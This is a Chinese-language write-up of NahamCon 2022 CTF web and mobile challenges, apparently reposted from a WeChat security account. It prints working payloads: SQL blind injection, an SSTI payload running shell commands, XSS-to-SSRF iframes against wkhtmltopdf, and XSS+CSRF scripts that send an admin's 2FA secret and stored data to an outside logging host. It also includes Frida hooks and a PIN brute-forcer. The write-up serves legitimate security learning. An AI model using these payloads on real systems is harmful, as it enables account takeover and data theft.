《nahamcon》

nahamcon-2022

假期没事干就找了个简单的CTF玩了下，题目地址在：https://ctf.nahamcon.com/challenges

Web

easy Dr. John Hammond has put together a small portfolio about himself for his new theme park, Jurassic Park. Check it out here!

robots.txt -> path -> flag.txt

easy A challenge that was never discovered during the 2021 Constellations mission... now ungated

app.py

#!/usr/bin/env python

from flask import Flask, Response, abort, request, render_template
import random
from string import *
import re

app = Flask(__name__)

flag = open("flag.txt").read()
users = open("users.txt").read()

users += flag


@app.route("/", methods=["GET", "POST"])
def index():
  if request.method == "GET":
  return render_template("lookup.html")
 if request.method == "POST":
 name = request.form["name"]
 setting = int(request.form["setting"])
    if name:
            if name[0].isupper():
                name = name[1:]
  results = re.findall(r"[A-Z][a-z]*?" + name 
  + r"[a-z]*?n", users, setting)
  results = [x.strip() for x in results
  if x or len(x) > 1]
  return render_template("lookup.html", 
  passed_results=True, results=results)
if __name__ == "__main__":
    app.run()

正则匹配，re.findall第三个参数值作用是匹配模式

re.I
    IGNORECASE
    忽略字母大小写

re.L
    LOCALE
    影响 “w, “W, “b, 和 “B，这取决于当前的本地化设置。

re.M
    MULTILINE
    使用本标志后，‘^’和‘$’匹配行首和行尾时，
    会增加换行符之前和之后的位置。

re.S
    DOTALL
    使 “.” 特殊字符完全匹配任何字符，
    包括换行；没有这个标志，“.” 匹配除了换
    行符外的任何字符。

re.X
    VERBOSE
    当该标志被指定时，在 RE 字符串中的空白
    符被忽略，除非该空白符在字符类中或在反
    斜杠之后。它也可以允许你将注释写入 RE，
    这些注释会被引擎忽略；注释用 “#”号来
    标识，不过该符号不能在字符串或反斜杠
    之后。

直接用如下请求即可获取flag:setting=2&name={(.*)}

easy I've been working on a XML parsing service. It's not finished but there should be enough for you to try out. The flag is in /var/www

1. 1. upload xml

2. 2. load xml

3. 3. read flag

medium Edward has decided to get into web development, and he built this awesome application that lets you search for any metal you want. Alphonse has some reservations though, so he wants you to check it out and make sure it's legit.

SQL盲注

@app.route("/", methods=["GET", "POST"])
def index():
    if request.method == "POST":
        search = ""
        order = None
        if "search" in request.form:
        search = request.form["search"]
        if "order" in request.form:
        order = request.form["order"]
        if order is None:
            metals = Metal.query.filter
            (Metal.name.like("%{}%".
            format(search)))
        else:
            metals = Metal.query.filter(
                Metal.name.like
                ("%{}%".format(search))
            ).order_by(text(order))
        return render_template
        ("home.html", metals=metals)
    else:
        metals = Metal.query.all()
        return render_template
        ("home.html", metals=metals)


if __name__ == "__main__":
    seed_db()
    app.run(debug=False)

使用类似的payload即可search=s&order=(case when substr ((select flag from flag limit 1),1,1)='f' then name else 1 end) limit 1

hard Deafcon 2022 is finally here! Make sure you don't miss it.

登陆后会将信息生成PDF，查看PDF信息可以知道用的是WKHTMLTOPDF

该组件存在XSS到SSRF的操作：http://hassankhanyusufzai.com/SSRF-to-LFI/

所以在用户名和邮箱处寻找XSS,其中用户名只能是a-Z_邮箱要符合RFC 5322标准，显然，这里要通过邮箱进行突破，可以通过翻阅文档了解到邮箱前缀在"的包裹下可以有<>在内的特殊字符：

• • https://zh.m.wikipedia.org/wiki/%E9%9B%BB%E5%AD%90%E9%83%B5%E4%BB%B6%E5%9C%B0%E5%9D%80

• • https://datatracker.ietf.org/doc/html/rfc5322#section-3.4

所以可以构造XSS: http://challenge.nahamcon.com:30241/ticketname=123&email=%22%3Ciframe%3E%22%40gmail.com

ps: 结束后看Writeup才知道这里实际上考察的是python的ssti但是由于不能使用圆括号所以给出了其他编码的圆括号进行绕过，这里原因暂且不明白 最终payload:http://challenge.nahamcon.com:30901/ticket？name=123&email=%22{{request.application[%27__globals__%27].__builtins__.__import__%EF%BC%88%27os%27%EF%BC%89.popen%EF%BC%88%27cat%20flag.txt%27%EF%BC%89.read%EF%BC%88%EF%BC%89}}%22%40mail.com

https://unicode-search.net/unicode-namesearch.pl?term=PARENTHESIS

hard We all love our hacker t-shirts. Make your own custom ones.

会使用WKHTMLTOPDF根据用户输入的内容生成图片，可以进行XSS

http://challenge.nahamcon.com:32721/exploit?text=%3Cimg%20src=%27https://ctftime.org/static/images/ct/logo.svg%27%20onload=%22document.write(123);%22%3E&color=%2324d600

存在有admin端口，但是提示需要内网访问，所以利用xss-ssrf http://challenge.nahamcon.com:32721/exploit?text=%3Ciframe%20src=%22http://localhost:5000/admin%22%3E&color=%2324d600

但是报错了

看起来是加载JS的时候出问题了，所以给iframe加上sandbox属性，禁止加载JS

最终的payload:

http://challenge.nahamcon.com:32721/exploit?text=%3Ciframe%20height=%22500%22%20width=%22350%22%20src=%22http://localhost:5000/admin%22%20sandbox=%22%22%3E&color=%2324d600

hard Need to keep things secure? Try out our safe, the most secure in the world!

登陆后发现可以创建私密内容，并且查看时需要双因子认证

在设置里有一个feedback

推测是XSS+CSRF，所以反馈处盲打XSS，并且在过一段时间后DNSLOG中收到请求，所以思路就是：

• • 获得admin双因子认证的二维码，绑定admin的账号

• • 利用双因子的验证码构造CSRF读取flag

其实是XSS + CSRF重复了两次的结果 获取双因子认证二维码

 <script>fetch("/reset2fa",{method:"post"}).then(data=>data.json()).then(data=>fetch("http://w123ww.eansy2q5.eyes.sh",{method:"POST",body:JSON.stringify(data), mode:"no-cors"}))</script>

读取flag

<script>fetch("/show_secret",{method:"post",body:'{"otp":"891467","secretId":"1"}', headers: {      "Content-Type": "application/json"}}).then(data=>data.json()).then(data=>fetch("http://w1423ww.eansy2q5.eyes.sh",{method:"POST",body:JSON.stringify(data), mode:"no-cors"}))</script>

hard Have your say! Poller is the place where all the important infosec questions are asked.

太菜了没做出来

Mobile

easy

直接反编译搜索flag

medium I created my own vault application to store my secrets. It uses OTP to unlock the vault so no one can steal my password!

安装APK后输入任意内容，得到了错误的返回

反编译文件后搜索Invalid OTP，在index.android.bundle文件中发现了相关函数

尝试构造请求： curl -i -s -k -X $'GET' -H $'Authorization: Bearer KMGQ0YTYgIMTk5Mjc2NzZY4OMjJlNzAC0WU2DgiYzE41ZDwN' $'http://congon4tor.com/flag' 可以拿到flag，如果觉得这个文件不太好看，可以使用https://github.com/nomi9995/react-native-decompiler进行反编译

hard I created a cookie clicker application to pass the time. There's a special prize that I can't seem to get.

反编译可以看到逻辑

很显然，只要hook掉getFlagButton让它直接调用getFlag即可

Java.perform(function(){
    Java.use("com.example.clickme.MainActivity").getFlagButtonClick.implementation = function (a) {
      console.log(this.getFlag());
      return;
    }
});

hard None of the free note taking app offer encryption... So I made my own!

反编译看到主要逻辑就是判断输入密码是否正确然后使用密码解密数据文件

安装APP后发现密码只能是数字且只有四位，所以就可以进行爆破了 首先获取到加密文件:

Java.choose("com.congon4tor.securenotes.LoginActivity$a",{
    onMatch: function(instance){
        console.log(instance.c.value)
    },
    onComplete: function () {
        console.log("end")
    }
})
/data/user/0/com.congon4tor.securenotes/cache/db.encrypted

拉取到本地:

adb pull /data/user/0/com.congon4tor.securenotes/cache/db.encrypted /tmp

直接把解密函数复制过来用java进行爆破

public class Hello {


    public static void main(String[] args) {
        String a = StrUtil.fill("1",'0',4, true);
        String b = "";
        for (int i = 0; i < 10000; i++) {
            a = StrUtil.fill(String.valueOf(i),'0',4, true);
            b = a + a + a + a;
            k(b, new File("/tmp/db.encrypted"),new File("/tmp/"+a+".db"));
        }

        System.out.println(a);
    }

    public static void k(String str, File file, File file2) {
        try {
            SecretKeySpec secretKeySpec = new SecretKeySpec(str.getBytes(), "AES");
            Cipher instance = Cipher.getInstance("AES");
            instance.init(2, secretKeySpec);
            FileInputStream fileInputStream = new FileInputStream(file);
            byte[] bArr = new byte[(int) file.length()];
            fileInputStream.read(bArr);
            byte[] doFinal = instance.doFinal(bArr);
            FileOutputStream fileOutputStream = new FileOutputStream(file2);
            fileOutputStream.write(doFinal);
            fileInputStream.close();
            fileOutputStream.close();

            System.out.println(str);

        } catch (IOException | InvalidKeyException | NoSuchAlgorithmException | BadPaddingException | IllegalBlockSizeException | NoSuchPaddingException e2) {

        }
    }

}

最终获取到flag

原文始发于微信公众号（RainSec）：《nahamcon》